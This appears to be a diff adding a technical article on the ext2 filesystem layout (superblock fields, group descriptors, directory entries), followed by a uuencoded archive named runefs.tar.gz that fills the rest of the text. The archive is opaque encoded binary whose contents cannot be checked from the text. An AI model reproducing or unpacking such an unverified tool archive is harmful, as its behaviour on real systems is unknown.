+#define EXT2_OS_MASIX           2
+#define EXT2_OS_FREEBSD         3
+#define EXT2_OS_LITES           4
+---------------------------------------------------------------------------
+
+* s_rev_level		The revision of the file system. The only
+			difference in values deals with inode sizes. The
+			current version uses a fixed inode size of 128
+			bytes.  The following are valid values:
+---------------------------------------------------------------------------
+#define EXT2_GOOD_OLD_REV       0   /* The good old (original) format   */
+#define EXT2_DYNAMIC_REV        1   /* V2 format w/ dynamic inode sizes */
+#define EXT2_CURRENT_REV        EXT2_GOOD_OLD_REV
+---------------------------------------------------------------------------
+
+* s_def_resuid		Default UID for reserved blocks. The default is 0.
+
+* s_def_resgid		Default GID for reserved blocks. The default is 0.
+
+* s_first_ino		The first non reserved inode. Inodes < 10 are
+			reserved, so the first valid inode number is 11.
+			This inode is almost always the file "lost+found".
+
+* s_inode_size		The size of an inode. The size is 128 bytes for
+			current ext2fs implementations.
+
+* s_block_group_nr	The block group that this super block is stored in. 
+
+* s_feature_compat	Flags of features that this ext2fs supports.  Valid
+			features are the following:
+---------------------------------------------------------------------------
+#define EXT2_FEATURE_COMPAT_DIR_PREALLOC        0x0001
+---------------------------------------------------------------------------
+
+* s_feature_incompat	Flags of features that this ext2fs doesnt' support. 
+			Valid incompatabilities are the following:
+---------------------------------------------------------------------------
+#define EXT2_FEATURE_INCOMPAT_COMPRESSION       0x0001
+#define EXT2_FEATURE_INCOMPAT_FILETYPE          0x0002
+---------------------------------------------------------------------------
+
+* s_feature_ro_compat	Flags of features that this ext2fs supports as read
+			only.  Valid features are as follows:
+---------------------------------------------------------------------------
+#define EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER     0x0001
+#define EXT2_FEATURE_RO_COMPAT_LARGE_FILE       0x0002
+#define EXT2_FEATURE_RO_COMPAT_BTREE_DIR        0x0004
+---------------------------------------------------------------------------
+
+* s_uuid		The unique ID of this ext2fs.
+
+* s_volume_name		The name of the volume. (I don't know what this is
+			used for, but it sertainly isn't important).
+
+* s_last_mounted	The directory on which this file system was last
+			mounted.
+
+* s_algorithm_usage_bitmap	(I don't know how this is used. No
+				interest in FS compression.)
+
+* s_prealloc_blocks	The number of blocks to try to preallocate for a
+			file. 
+
+* s_prealloc_dir_blocks	The number of block to try to preallocate for a
+			directory file.
+
+* s_padding1		padding. 
+
+* s_journal_*		(I don't have journalling support on my FS,
+			therefore I do not know how these values are used.)
+* s_reserverd[]		This is padding to fill the super block out to 1024
+			bytes.
+
+
+		. o O ( G R O U P S ) O o .
+
+    Ext2fs groups are used to organise clusters of blocks and inodes.
+Groups each contain a bitmap of free inodes, and one of free blocks.
+Additionally each group has a copy of the super block to help prevent
+against catastrophic data loss. Group descriptors are stored on the blocks
+immediately after the super block, following them are bitmaps and inode
+tables, and following that data blocks.
+
+The format of a group descriptor is as follows:
+-----------------------------------------------------------------------------
+struct ext2_group_desc
+{
+        __u32   bg_block_bitmap;                /* Blocks bitmap block */
+        __u32   bg_inode_bitmap;                /* Inodes bitmap block */
+        __u32   bg_inode_table;         /* Inodes table block */
+        __u16   bg_free_blocks_count;   /* Free blocks count */
+        __u16   bg_free_inodes_count;   /* Free inodes count */
+        __u16   bg_used_dirs_count;     /* Directories count */
+        __u16   bg_pad;
+        __u32   bg_reserved[3];
+};
+-----------------------------------------------------------------------------
+
+* bg_block_bitmap	A block pointer to the block bitmap. The bits in
+			the bitmap are set to indicate free/in-use.
+
+* bg_inode_bitmap	A block pointer to the inode bitmap. The bits in
+			the bitmap are set to indicate free/in-use.
+
+* bg_inode_table	A block pointer to the start of the inode table.
+
+* bg_free_blocks_count	The number of blocks within the group that are
+			available for use.
+
+* bg_free_inodes_count	The number of inodes within the group that are
+			available for use.
+
+* bg_used_dirs_count	The number of inodes from this group used for
+			directory files.
+
+* bg_pad		padding.
+* pg_reserved[]		padding.
+
+
+
+		. o O ( D I R E C T O R I E S ) O o .
+
+    Directories are used to organize files at the Operating system level.
+The contents of a directory file is an array of directory entry structures.
+Each contains the name of a file within the directory, and the inode of
+that file. 
+
+The format of ext2 directory entries is as follows:
+---------------------------------------------------------------------------
+struct ext2_dir_entry_2 {
+        __u32   inode;                  /* Inode number */
+        __u16   rec_len;                /* Directory entry length */
+        __u8    name_len;               /* Name length */
+        __u8    file_type;
+        char    name[EXT2_NAME_LEN];    /* File name */
+};
+---------------------------------------------------------------------------
+
+* inode		The inode number of the file within the directory. If a
+                file has been deleted, the inode number is set to 0.
+
+* rec_len	The size of the directory entry. As the length of the name
+		can be anything up to 255 byte, this allows for more
+		efficient use of space within the directory file.
+
+* name_len	The length of the file's name. This can be up to 255 bytes.
+
+* file_type	The type of file, i.e. symlink, device, etc. etc. The
+		following are valid values:
+---------------------------------------------------------------------------
+#define EXT2_FT_UNKNOWN         0
+#define EXT2_FT_REG_FILE        1
+#define EXT2_FT_DIR             2
+#define EXT2_FT_CHRDEV          3
+#define EXT2_FT_BLKDEV          4
+#define EXT2_FT_FIFO            5
+#define EXT2_FT_SOCK            6
+#define EXT2_FT_SYMLINK         7
+---------------------------------------------------------------------------
+
+    This concludes the walk through of the physical layout of the ext2 file
+system. Further information is available from
+http://e2fsprogs.sourceforge.net.
+
+
+----[ 8.2 - runefs.tar.gz (uuencoded)
+
+begin 600 runefs.tar.gz
+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
